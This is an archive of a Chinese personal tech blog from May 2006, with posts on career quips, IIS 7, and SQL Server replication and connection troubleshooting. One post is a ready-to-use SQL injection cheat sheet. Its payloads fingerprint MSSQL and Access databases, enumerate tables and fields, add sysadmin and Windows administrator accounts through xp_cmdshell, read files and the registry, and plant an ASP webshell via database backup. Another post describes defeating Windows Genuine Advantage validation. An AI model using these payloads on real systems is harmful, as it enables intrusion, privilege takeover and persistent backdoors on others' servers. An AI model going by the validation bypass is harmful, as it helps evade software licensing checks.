Wednesday, May 31, 2006

信用生活从我爱卡开始

Posted by Wyulnnhtg at 10:38:56 | Permalink | Comments (1) »

Friday, May 26, 2006

摘自:搜职网(www.globehr.com)

不要读博士,因为博士在美国找工作的难度,相当于女博士在中国找老公的难度。也千万不要羡慕有3个博士头衔的人,因为只有找不到工作的时候才会一个接一个地读博士。
———一个没有博士头衔的留学生如是说。
 
千万不要以为美国没有天才,美国的天才只不过是喜欢退学而已。也千万不要以为中国人都是天才,中国的有些天才除了考分高,基本上什么都不会。
———一个留学生在看到中国人在拼命上哈佛时说。
 
他们以为MBA就像是一个美容院,读完MBA,出来就会容光焕发,脱胎换骨。
———令专家担忧的是:MBA在中国已被简化为高薪加升职。
 
中国人太多了,13亿人,你藏在这么多人里头,怎样才能引起别人注意?一个老板要请人,两个应聘者能力差不多,那他一定会选那个长得比较好看的。
———一位整容师如此解释为何中国流行整容热。
 
让我讲创业的故事,就像祥林嫂讲阿毛的故事一样,讲多了也没什么意义。
———《福布斯》和《欧洲货币》双料中国内地首富丁磊在母校中国电子科大说的话,以此表示对富豪话题的厌倦。
 
八分人才,九分使用,十分待遇。
———力帆集团董事长尹明善谈民营企业的留人之道。
 
总是在裁人,简称总裁;老是板着脸,故称老板;经常不理人那叫经理。
———商业职位新解。
 
铁饭碗的真正含义不是在一个地方吃一辈子饭,而是一辈子到哪儿都有饭吃。
———一个在网络上流传的帖子
Posted by Wyulnnhtg at 04:29:11 | Permalink | No Comments »

MOP上看到的贴,相当有意思。。

贴上说,无论多大的一张纸,最多只能对折八次!(看好了,是对折)

看着很是怀疑,所以亲手实验起来。。

结果十分意外,真的是无论如何也不能超过八次!

我甚至用了只有一层的餐巾纸,卫生间的手纸。。。

长见识了,又一真理!大家学习吧。。

Posted by Wyulnnhtg at 04:14:54 | Permalink | Comments (1) »

Wednesday, May 24, 2006

IIS 7 最新信息: IIS.net 上线!

IIS 7将是Longhorn Server中的重要组件,以往的6个版本微软也从未用过独立的域名来宣传和讲解,最近关于IIS 7的报道和内幕也越来越多,想要了解更多,我们一起来看IIS.net—微软官方刚刚上线的IIS专业技术网站,记录了IIS开发团队的全部!IIS.net金属感十足的界面,估计是想突出其稳定性有安全性吧!以下是IIS7的官方介绍:

Internet Information Services 7.0

More than just a Web server, Internet Information Servers 7.0 (IIS7) provides a secure, easy to manage platform for developing and reliably hosting Web applications and services.

With IIS7 you can:

  • Minimize patching and security risks with fine grained control over Web server footprint
  • Implement powerful Web solutions rapidly with a new extensibility framework
  • Go to market faster with simplified deployment and configuration of applications
  • Reduce administrative costs by managing Web infrastructure more efficiently
  • Reduce Web site downtime by quickly resolving faulty applications

Modular Architecture: IIS7 is designed to enable the IT professional to customize exactly which features are installed and running on the Web server. IIS is now factored into more than 40 feature modules that can be independently installed on the box, dramatically reducing the potential attack surface, and lowering the footprint requirements on the machine.

Comprehensive Extensibility: IIS7 enables developers to extend the Web server in a seamless way. IIS7 own core web server features are now built using a new set of public Web server APIs that all developers can use to extend, replace or add functionality to the web server. These APIs are available as both native Win32 APIs as well as managed .NET Framework APIs. Developers can also take advantage of IIS7’s extensibility of event logging, configuration, and administration tool feature-sets, providing a seamless experience for customers using third party extensions.

Unified, Distributable Configuration Model: IIS7 provides developers and administrators a unified configuration system for storing all IIS and ASP.NET settings in a single XML format and includes a set of managed code and scripting APIs for accessing configuration for the entire Web platform. This new configuration system supports distributed configuration files, which can be stored along with Web site or application content.

These improvements have radical implications for how applications are configured and deployed. Now that Web site and application settings are no longer explicitly tied to a centralized configuration store on the machine, configuration can simply be copied from the developer’s workstation, to a test server, and on to the production Web server. Once a Web site is in production, administrators can share configuration information across multiple front-end Web servers, avoiding costly and error-prone replication and manual synchronization issues.

Efficient Administration Tools: IIS7 offers a broad set of administration features that simplify the day-to-day tasks of managing Web sites and applications. IIS7 includes a new GUI admin tool, a new command line utility, a new managed API, and a new WMI provider for automating administration tasks. All of these new administration features provide unified support for managing both IIS and ASP.NET settings together.

IIS7’s new GUI admin tool offers a new, more efficient tool for managing the Web server. It provides support for both IIS and ASP.NET configuration settings, membership users and role data, as well as runtime diagnostic information. The new UI also enables those who host or administer Web sites to delegate administrative control to developers or content owners, thus reducing cost of ownership and administrative burden for the IT Professional. It supports connecting to remote servers over HTTP (so through firewalls), and works in both dedicated and shared hosting environments.

Powerful Diagnostic Capabilities: IIS7 enables developers and IT Professionals to more easily troubleshoot errant Web sites and applications. IIS7 exposes runtime diagnostic information to administrators (for example: what requests are currently executing, how long they’ve been running, which urls they are invoking, what client called them, and what their status is). IIS7 can also be configured to automatically log detailed trace events for requests when failures are detected. These diagnostic capabilities in IIS7 are extensible as well, so new diagnostic events can be inserted into custom modules.

Summary
With IIS7, Microsoft releases its most powerful Web server ever, offering an impressive array of new capabilities that dramatically improve the way Web solutions are developed, deployed and managed. The modular design of IIS7 provides administrators an unprecedented degree of control over their Web server. IIS7’s flexible, extensible architecture presents developers with brand new opportunities for customizing the web server. The rich administration capabilities make deploying and managing Web applications on IIS7 more straightforward and efficient than on any other Web server. Lastly, IIS7’s powerful diagnostic and troubleshooting capabilities help users rapidly triage issues eliminating hours of potential downtime. These are just a few of the reasons to try IIS today.

Posted by Wyulnnhtg at 15:40:19 | Permalink | No Comments »

骏哥blog上非友好的错误提示。。

更确切点,应该说是非常不友好~哈哈。。

进入查看~~别把鼻血喷到我的Blog上。哈哈~

Posted by Wyulnnhtg at 13:50:46 | Permalink | No Comments »

Tuesday, May 23, 2006

解决不能通过验证,XP无法升级的方法

首先需要通过windows update功能升级一下,确定无法升级,再按下面的方法操作!

找到C:\Documents and Settings\All Users\Application Data\Windows Genuine Advantage\data下面的data.dat文件,先将它的属性中的只读勾去掉,再用记事本打开它。看到了什么?一堆乱码?是的,乱码,不管它,全部删掉。删完了只剩下空的文档以后,再随便打上几个字,实在不知道写什么就写自己名字好了:“Hi Wyulnnhtg!”^_^然后保存。保存以后还有一个很重要的一点就是,别忘了在属性里“只读”打上勾!切记,不写只读还是会还原的。

Posted by Wyulnnhtg at 08:05:04 | Permalink | Comments (3)

Thursday, May 18, 2006

两台SQL Server数据同步解决方案

复制的概念
  
  复制是将一组数据从一个数据源拷贝到多个数据源的技术,是将一份数据发布到多个存储站点上的有效方式。使用复制技术,用户可以将一份数据发布到多台服务器上,从而使不同的服务器用户都可以在权限的许可的范围内共享这份数据。复制技术可以确保分布在不同地点的数据自动同步更新,从而保证数据的一致性。
  
  SQL复制的基本元素包括
  
  出版服务器、订阅服务器、分发服务器、出版物、文章
  
  SQL复制的工作原理
  
  SQL SERVER 主要采用出版物、订阅的方式来处理复制。源数据所在的服务器是出版服务器,负责发表数据。出版服务器把要发表的数据的所有改变情况的拷贝复制到分发服务器,分发服务器包含有一个分发数据库,可接收数据的所有改变,并保存这些改变,再把这些改变分发给订阅服务器


  
  SQL SERVER复制技术类型
  
  SQL SERVER提供了三种复制技术,分别是:
  
  1、快照复制(呆会我们就使用这个)
  2、事务复制
  3、合并复制
  
  只要把上面这些概念弄清楚了那么对复制也就有了一定的理解。接下来我们就一步一步来实现复制的步骤。
  
  第一先来配置出版服务器
  
  (1)选中指定[服务器]节点
  (2)从[工具]下拉菜单的[复制]子菜单中选择[发布、订阅服务器和分发]命令
  (3)系统弹出一个对话框点[下一步]然后看着提示一直操作到完成。
  (4)当完成了出版服务器的设置以后系统会为该服务器的树形结构中添加一个复制监视器。同时也生成一个分发数据库(distribution)
  
  第二创建出版物
  
  (1)选中指定的服务器
  (2)从[工具]菜单的[复制]子菜单中选择[创建和管理发布]命令。此时系统会弹出一个对话框
  (3)选择要创建出版物的数据库,然后单击[创建发布]
  (4)在[创建发布向导]的提示对话框中单击[下一步]系统就会弹出一个对话框。对话框上的内容是复制的三个类型。我们现在选第一个也就是默认的快照发布(其他两个大家可以去看看帮助)
  (5)单击[下一步]系统要求指定可以订阅该发布的数据库服务器类型,SQLSERVER允许在不同的数据库如 ORACLE或ACCESS之间进行数据复制。但是在这里我们选择运行”SQL SERVER 2000″的数据库服务器
  (6)单击[下一步]系统就弹出一个定义文章的对话框也就是选择要出版的表
  (7)然后[下一步]直到操作完成。当完成出版物的创建后创建出版物的数据库也就变成了一个共享数据库。
  
  第三设计订阅
  
  (1)选中指定的订阅服务器
  (2)从[工具]下拉菜单中选择[复制]子菜单的[请求订阅]
  (3)按照单击[下一步]操作直到系统会提示检查SQL SERVER代理服务的运行状态,执行复制操作的前提条件是SQL SERVER代理服务必须已经启动。
  (4)单击[完成]。完成订阅操作。
  
  完成上面的步骤其实复制也就是成功了。但是如何来知道复制是否成功了呢?这里可以通过这种方法来快速看是否成功。展开出版服务器下面的复制——发布内容——右键发布内容——属性——击活——状态然后点立即运行代理程序接着点代理程序属性击活调度把调度设置为每一天发生,每一分钟,在0:00:00和23:59:59之间。接下来就是判断复制是否成功了打开C:\Program Files\Microsoft SQL Server\MSSQL\REPLDATA\unc\XIAOWANGZI_database_database下面看是不是有一些以时间做为文件名的文件夹差不多一分中就产生一个。要是你还不信的话就打开你的数据库看在订阅的服务器的指定订阅数据库下看是不是看到了你刚才所发布的表—

  一个手工同步的方案
  
  –定时同步服务器上的数据
  
  –例子:
  
  –测试环境,SQL Server2000,远程服务器名:xz,用户名为:sa,无密码,测试数据库:test
  
  –服务器上的表(查询分析器连接到服务器上创建)
  
  create table [user](id int primary key,number varchar(4),name varchar(10))
  go
  
  –以下在局域网(本机操作)
  
  –本机的表,state说明:null 表示新增记录,1 表示修改过的记录,0 表示无变化的记录
  
  if exists (select * from dbo.sysobjects where id = object_id(N’[user]‘) and OBJECTPROPERTY(id, N’IsUserTable’) = 1)
  drop table [user]
  GO
  create table [user](id int identity(1,1),number varchar(4),name varchar(10),state bit)
  go
  
  –创建触发器,维护state字段的值
  
  create trigger t_state on [user]
  after update
  as
  update [user] set state=1
  from [user] a join inserted b on a.id=b.id
  where a.state is not null
  go
  
  –为了方便同步处理,创建链接服务器到要同步的服务器
  
  –这里的远程服务器名为:xz,用户名为:sa,无密码
  
  if exists(select 1 from master..sysservers where srvname=’srv_lnk’)
  exec sp_dropserver ’srv_lnk’,'droplogins’
  go
  exec sp_addlinkedserver ’srv_lnk’,”,’SQLOLEDB’,'xz’
  exec sp_addlinkedsrvlogin ’srv_lnk’,'false’,null,’sa’
  go
  
  –创建同步处理的存储过程
  
  if exists (select * from dbo.sysobjects where id = object_id(N’[dbo].[p_synchro]‘) and OBJECTPROPERTY(id, N’IsProcedure’) = 1)
  drop procedure [dbo].[p_synchro]
  GO
  create proc p_synchro
  as
  –set XACT_ABORT on
  
  –启动远程服务器的MSDTC服务
  
  –exec master..xp_cmdshell ‘isql /S”xz” /U”sa” /P”" /q”exec master..xp_cmdshell ”net start msdtc”,no_output”‘,no_output
  
  –启动本机的MSDTC服务
  
  –exec master..xp_cmdshell ‘net start msdtc’,no_output
  
  –进行分布事务处理,如果表用标识列做主键,用下面的方法
  
  –BEGIN DISTRIBUTED TRANSACTION

  –同步删除的数据
  
  delete from srv_lnk.test.dbo.[user]
  where id not in(select id from [user])
  
  –同步新增的数据
  
  insert into srv_lnk.test.dbo.[user]
  select id,number,name from [user] where state is null
  
  –同步修改的数据
  
  update srv_lnk.test.dbo.[user] set
  number=b.number,name=b.name
  from srv_lnk.test.dbo.[user] a
  join [user] b on a.id=b.id
  where b.state=1
  
  –同步后更新本机的标志
  
  update [user] set state=0 where isnull(state,1)=1
  –COMMIT TRAN
  go
  
  –创建作业,定时执行数据同步的存储过程
  
  if exists(SELECT 1 from msdb..sysjobs where name=’数据处理’)
  EXECUTE msdb.dbo.sp_delete_job @job_name=’数据处理’
  exec msdb..sp_add_job @job_name=’数据处理’
  
  –创建作业步骤
  
  declare @sql varchar(800),@dbname varchar(250)
  select @sql=’exec p_synchro’ –数据处理的命令
  ,@dbname=db_name() –执行数据处理的数据库名
  exec msdb..sp_add_jobstep @job_name=’数据处理’,
  @step_name = ‘数据同步’,
  @subsystem = ‘TSQL’,
  @database_name=@dbname,
  @command = @sql,
  @retry_attempts = 5, –重试次数
  @retry_interval = 5 –重试间隔
  
  –创建调度
  
  EXEC msdb..sp_add_jobschedule @job_name = ‘数据处理’,
  @name = ‘时间安排’,
  @freq_type = 4, –每天
  @freq_interval = 1, –每天执行一次
  @active_start_time = 00000 –0点执行
  go

Posted by Wyulnnhtg at 18:21:14 | Permalink | No Comments »

SQL Server连接中常见的错误分析

一、“SQL Server 不存在或访问被拒绝”

  这个是最复杂的,错误发生的原因比较多,需要检查的方面也比较多。

  一般说来,有以下几种可能性:

  1、SQL Server名称或IP地址拼写有误
  2、服务器端网络配置有误
  3、客户端网络配置有误

  要解决这个问题,我们一般要遵循以下的步骤来一步步找出导致错误的原因。

  首先,检查网络物理连接
  ping <服务器IP地址/服务器名称>
  如果 ping <服务器IP地址> 不成功,说明物理连接有问题,这时候要检查硬件设备,如网卡,HUB,路由器等。

  还有一种可能是由于客户端和服务器之间安装有防火墙软件造成的,比如 ISA Server。防火墙软件可能会屏蔽对 ping,telnet 等的响应,因此在检查连接问题的时候,我们要先把防火墙软件暂时关闭,或者打开所有被封闭的端口。

  如果ping <服务器IP地址> 成功而,ping <服务器名称> 失败,则说明名字解析有问题,这时候要检查 DNS 服务是否正常。

  有时候客户端和服务器不在同一个局域网里面,这时候很可能无法直接使用服务器名称来标识该服务器,这时候我们可以使用HOSTS文件来进行名字解析,具体的方法是:

  1、使用记事本打开HOSTS文件(一般情况下位于C:\WINNT\system32\drivers\etc)。
  添加一条IP地址与服务器名称的对应记录,如:
  172.168.10.24 myserver

  2、或在 SQL Server 的客户端网络实用工具里面进行配置,后面会有详细说明。

  其次,使用 telnet 命令检查SQL Server服务器工作状态
  telnet <服务器IP地址> 1433

  如果命令执行成功,可以看到屏幕一闪之后光标在左上角不停闪动,这说明 SQL Server 服务器工作正常,并且正在监听1433端口的 TCP/IP 连接,如果命令返回”无法打开连接”的错误信息,则说明服务器端没有启动 SQL Server 服务,也可能服务器端没启用 TCP/IP 协议,或者服务器端没有在 SQL Server 默认的端口1433上监听。

  接着,我们要到服务器上检查服务器端的网络配置,检查是否启用了命名管道。是否启用了 TCP/IP 协议等等,可以利用 SQL Server 自带的服务器网络使用工具来进行检查。

  点击:程序 Microsoft SQL Server 服务器网络使用工具

  打开该工具后,在”常规”中可以看到服务器启用了哪些协议。
  一般而言,我们启用命名管道以及 TCP/IP 协议。
  点中 TCP/IP 协议,选择”属性”,我们可以来检查 SQK Server 服务默认端口的设置
  一般而言,我们使用 SQL Server 默认的1433端口。如果选中”隐藏服务器”,则意味着客户端无法通过枚举服务器来看到这台服务器,起到了保护的作用,但不影响连接。

  接下来我们要到客户端检查客户端的网络配置
  我们同样可以利用 SQL Server 自带的客户端网络使用工具来进行检查,
  所不同的是这次是在客户端来运行这个工具。

  点击:程序 Microsoft SQL Server 客户端网络使用工具

  打开该工具后,在”常规”项中,可以看到客户端启用了哪些协议。
  一般而言,我们同样需要启用命名管道以及 TCP/IP 协议。
  点击 TCP/IP 协议,选择”属性”,可以检查客户端默认连接端口的设置,该端口必须与服务器一致。

  单击”别名”选项卡,还可以为服务器配置别名。服务器的别名是用来连接的名称,连接参数中的服务器是真正的服务器名称,两者可以相同或不同。别名的设置与使用HOSTS文件有相似之处。

  通过以上几个方面的检查,基本上可以排除第一种错误。

  二、”无法连接到服务器,用户xxx登陆失败”

  该错误产生的原因是由于SQL Server使用了”仅 Windows”的身份验证方式,因此用户无法使用SQL Server的登录帐户(如 sa )进行连接。解决方法如下所示:

  1、在服务器端使用企业管理器,并且选择”使用 Windows 身份验证”连接上 SQL Server
  2、展开”SQL Server组”,鼠标右键点击SQL Server服务器的名称,选择”属性”,再选择”安全性”选项卡
  3、在”身份验证”下,选择”SQL Server和 Windows “。
  4、重新启动SQL Server服务。

  在以上解决方法中,如果在第 1 步中使用”使用 Windows 身份验证”连接 SQL Server 失败,那就通过修改注册表来解决此问题:

  1、点击”开始” “运行”,输入regedit,回车进入注册表编辑器
  2、依次展开注册表项,浏览到以下注册表键:
  [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSSQLServer
  \MSSQLServer]
  3、在屏幕右方找到名称”LoginMode”,双击编辑双字节值
  4、将原值从1改为2,点击”确定”
  5、关闭注册表编辑器
  6、重新启动SQL Server服务。

  此时,用户可以成功地使用sa在企业管理器中新建SQL Server注册,
  但是仍然无法使用Windows身份验证模式来连接SQL Server。
  这是因为在 SQL Server 中有两个缺省的登录帐户:
  BUILTIN\Administrators
  <机器名>\Administrator 被删除。
  要恢复这两个帐户,可以使用以下的方法:

  1、打开企业管理器,展开服务器组,然后展开服务器
  2、展开”安全性”,右击”登录”,然后单击”新建登录”
  3、在”名称”框中,输入 BUILTIN\Administrators
  4、在”服务器角色”选项卡中,选择”System Administrators”
  5、点击”确定”退出
  6、使用同样方法添加 <机器名>\Administrator 登录。

  说明:

  以下注册表键:
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSSQLServer
  \MSSQLServer\LoginMode
  的值决定了SQL Server将采取何种身份验证模式。
  1、表示使用”Windows 身份验证”模式
  2、表示使用混合模式(Windows 身份验证和 SQL Server 身份验证)。

  三、提示连接超时

  如果遇到第三个错误,一般而言表示客户端已经找到了这台服务器,并且可以进行连接,不过是由于连接的时间大于允许的时间而导致出错。

  这种情况一般会发生在当用户在Internet上运行企业管理器来注册另外一台同样在Internet上的服务器,并且是慢速连接时,有可能会导致以上的超时错误。有些情况下,由于局域网的网络问题,也会导致这样的错误。

  要解决这样的错误,可以修改客户端的连接超时设置。

  默认情况下,通过企业管理器注册另外一台SQL Server的超时设置是 4 秒,而查询分析器是 15 秒(这也是为什么在企业管理器里发生错误的可能性比较大的原因)。

  具体步骤为:
  企业管理器中的设置:
  1、在企业管理器中,选择菜单上的”工具”,再选择”选项”
  2、在弹出的”SQL Server企业管理器属性”窗口中,点击”高级”选项卡
  3、在”连接设置”下的”登录超时(秒)”右边的框中输入一个比较大的数字,如 20。

  查询分析器中的设置:
  工具 选项 连接 将登录超时设置为一个较大的数字

  连接超时改为0

  1、先保证ping通
  2、在dos下写入telnet ip 1433不会报错
  3、用ip连如企业管理器:
  企业管理器>右键SQlserver组>新建sqlserver注册>下一步>写入远程实例名(IP,机器名)>下一步>选Sqlserver登陆>下一步>写入登陆名与密码(sa,pass)>下一步>下一步>完成
  4、如果还不行:
  sqlserver服务器>开始菜单>SQLserver>服务器网络实用工具>启用 WinSock代理>代理地址:(sqlserver服务器IP)>代理端口>1433>OK了
  5、如果还不行:
  sqlserver客户端>开始菜单>SQLserver>客户端网络实用工具>别名>添加>写入别名如”大力”>”网络库”选tcp/ip>服务器名称写入远程ip或实例名>OK了

Posted by Wyulnnhtg at 18:17:41 | Permalink | No Comments »

手工注入命令

1.判断是否有注入;and 1=1 ;and 1=2

2.初步判断是否是mssql ;and user>0

3.注入参数是字符’and [查询条件] and ”=’

4.搜索时没过滤参数的’and [查询条件] and ‘%25′=’

5.判断数据库系统
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access

6.猜数据库 ;and (select Count(*) from [数据库名])>0

7.猜字段 ;and (select Count(字段名) from 数据库名)>0

8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0

9.(1)猜字段的ascii值(access)
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0

(2)猜字段的ascii值(mssql)
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0

10.测试权限结构(mssql)
;and 1=(select IS_SRVROLEMEMBER(’sysadmin’));–
;and 1=(select IS_SRVROLEMEMBER(’serveradmin’));–
;and 1=(select IS_SRVROLEMEMBER(’setupadmin’));–
;and 1=(select IS_SRVROLEMEMBER(’securityadmin’));–
;and 1=(select IS_SRVROLEMEMBER(’diskadmin’));–
;and 1=(select IS_SRVROLEMEMBER(’bulkadmin’));–
;and 1=(select IS_MEMBER(’db_owner’));–

11.添加mssql和系统的帐户
;exec master.dbo.sp_addlogin username;–

;exec master.dbo.sp_password null,username,password;–

;exec master.dbo.sp_addsrvrolemember sysadmin username;–

;exec master.dbo.xp_cmdshell ‘net user username password
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add’;–

;exec master.dbo.xp_cmdshell ‘net user username password /add’;–

;exec master.dbo.xp_cmdshell ‘net localgroup administrators username /add’;–

12.(1)遍历目录

;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree ‘c:&#92;’
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not in(’上步得到的paths’))>)

(2)遍历目录
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));–
;insert temp exec master.dbo.xp_availablemedia;– 获得当前所有驱动器
;insert into temp(id) exec master.dbo.xp_subdirs ‘c:&#92;’;– 获得子目录列表
;insert into temp(id,num1) exec master.dbo.xp_dirtree ‘c:&#92;’;– 获得所有子目录的目录树构
;insert into temp(id) exec master.dbo.xp_cmdshell ‘type c:&#92;web&#92;index.asp’;– 查看文件的内容

13.mssql中的存储过程

xp_regenumvalues 注册表根键, 子键
;exec xp_regenumvalues ‘HKEY_LOCAL_MACHINE’,'SOFTWARE&#92;Microsoft&#92;Windows&#92;CurrentVersion&#92;Run’ 以多个记录集方式返回所有键值

xp_regread 根键,子键,键值名
;exec xp_regread
‘HKEY_LOCAL_MACHINE’,'SOFTWARE&#92;Microsoft&#92;Windows&#92;CurrentVersion’,'CommonFilesDir’ 返回制定键的值

xp_regwrite 根键,子键, 值名, 值类型, 值
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型
;exec xp_regwrite ‘HKEY_LOCAL_MACHINE’,'SOFTWARE&#92;Microsoft&#92;Windows&#92;CurrentVersion’,'TestValueName’,'reg_sz’,'hello’ 写入注册表

xp_regdeletevalue 根键,子键,值名

exec xp_regdeletevalue ‘HKEY_LOCAL_MACHINE’,'SOFTWARE&#92;Microsoft&#92;Windows&#92;CurrentVersion’,'TestValueName’ 删除某个值

xp_regdeletekey ‘HKEY_LOCAL_MACHINE’,'SOFTWARE&#92;Microsoft&#92;Windows&#92;CurrentVersion&#92;Testkey’ 删除键,包括该键下所有值

14.mssql的backup创建webshell
use model
create table cmd(str image);
insert into cmd(str) values (”);
backup database model to disk=’c:&#92;l.asp’;

15.mssql内置函数
;and (select @@version)>0 获得Windows的版本号
;and user_name()=’dbo’ 判断当前系统的连接用户是不是sa
;and (select user_name())>0 爆当前系统的连接用户
;and (select db_name())>0 得到当前连接的数据库

16.简洁的webshell

use model

create table cmd(str image);

insert into cmd(str) values (”);

backup database model to disk=’g:\wwwtest\l.asp’;

Posted by Wyulnnhtg at 04:44:10 | Permalink | No Comments »

Tuesday, May 16, 2006

管理单元初始化失败解决办法

方法一、1、点击『开始』菜单
    2、点击“运行”
    3、键入”regedit”(不包括感叹号)
    4、在注册表键值HKEY_CURRENT_USERSoftwarePoliciesMicrosoftMMC
    请将 RestrictToPermittedSnapins 的值设置为 0

方法二、1、点击『开始』菜单
    2、点击“运行”
    3、键入”regedit”(不包括感叹号)
    4、在注册表键值  HKEY_CURRENT_USERSoftwarePoliciesMicrosoftMmc{8FC0B734-A0E1-11D1-A7D3-0000F87571E3}Restrict_Run
和HKEY_CURRENT_USERSoftwarePoliciesMicrosoftMMC{0F6B957E-509E-11D1-A7CC-0000F87571E3}Restrict_Run 请将 Restrict_Run 的值设置为 0
5、修改完毕后重启。

方法三、1、点击『开始』菜单
    2、点击“运行”
    3、键入”regedit”(不包括感叹号)
    4、在注册表键值HKEY_CLASSES_ROOTCLSID{8FC0B734-A0E1-11D1-A7D3-0000F87571E3}InProcServer32 把其中的default改成:%SystemRoot%System32GPEdit.dll
5、修改完毕后重启。

方法四、检查环境变量:
    a、点击『开始』菜单
    b、点击“控制面板”
    c、在“控制面板”中打开“系统”
    d、在“系统属性”中点击“高级”标签
    e、在“高级”标签页中点击“环境变量”按钮
    f、在“环境变量”中的“系统变量”框中的变量名为Path中修改变量值为:
       %Systemroot%System32;%Systemroot%;%Systemroot%system32WBEM

方法五、运行regsvr32 filemgmt.dll
    a、点击『开始』菜单
    b、点击“运行”
    c、键入”regsvr32 filemgmt.dll”(不包括感叹号)

方法六、如果组策略找不到 framedyn.dll,就可能会出现这种错误。如果使用安装脚本,要确保脚本置于系统路径中的%windir%system32wbem 目录下。默认情况下,%windir%system32wbem 已经存在于系统路径中,因此,如果您不使用安装脚本,就不可能遇到这个问题。或试着将将Framedyn.dll文件从windowssystem32wbem目录下拷贝到windowssystem32目录下!

附:如果在方法一/二中提到的MMC项在你的计算机注册表中找不到,那么就手动建立即可。或者直接将下面内容复制粘贴进入记事本,并保存为后缀名为.reg的文件,双击运行该.reg文件即可。

另外gpedit.msc文件在windowssystem32文件夹下
文档http://www.weiblog.com/post/10.html
有可能是你的gpedit.msc这个文件损坏了,你可以从别人的机器中把这个文件拷一个过来,覆盖原来的文件试试
如果要是不管事的话,你可以试着把gpedit.dll文件重新注册一下,在运行下输入regsvr32 gpedit.dll,看看是不是报错,要是报错了的话就比较麻烦了,要不报错的话应该就解决了

Posted by Wyulnnhtg at 10:28:18 | Permalink | No Comments »